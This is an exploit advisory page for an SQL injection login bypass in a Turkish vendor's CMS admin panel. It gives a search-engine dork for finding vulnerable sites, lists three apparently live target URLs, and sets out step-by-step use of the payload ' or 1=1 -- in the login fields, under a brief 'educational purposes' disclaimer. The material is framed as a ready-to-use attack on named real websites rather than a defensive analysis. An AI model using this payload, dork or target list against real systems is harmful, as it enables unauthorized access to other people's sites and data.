Loca Software - Sql Injection/Admin Panel Bypass

2024.02.03

root9ext (TR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: intext:"bu web sitesi LOCA YAZILIM BİLİŞİM TEK. LTD. ŞTİ."

TITLE: Loca Software - Sql Injection/Admin Panel Bypass
# Exploit Author: Onur Kara (root9ext)
# Service Provider: LocaSoftware
# Vulnerable URL: /cms/
# Dork: intext:"bu web sitesi LOCA YAZILIM BİLİŞİM TEK. LTD. ŞTİ."
# Vulnerability Type: SQL Bypass
# Severity: Critical
Vulnerability Description:
A critical SQL injection vulnerability has been identified in the admin panel login functionality of Local Software's CMS, specifically within the /cms/ directory. The vulnerability allows an attacker to bypass authentication controls by injecting arbitrary SQL queries, resulting in unauthorized access to the admin panel.
Proof of Concept (PoC):
URLs:
- http://izmirsunnetmerkezi.com/cms/
- https://www.ozkankirtasiye.com.tr/cms/
- https://locapp.net/cms/
1. Visit the admin login page, typically located at: https://locapp.net/cms/
2. Input the following payload in the username and password fields:
' or 1=1 --
' or 1=1 --
3. Submit the form.
4. Observe that the admin panel is accessible without redirection, indicating successful authentication bypass.
# Disclaimer: This PoC is for educational purposes only. Unauthorized access to systems or applications is illegal.
Contact
Telegram: @rootninext

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Loca Software - Sql Injection/Admin Panel Bypass

Dork: intext:"bu web sitesi LOCA YAZILIM BİLİŞİM TEK. LTD. ŞTİ."

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.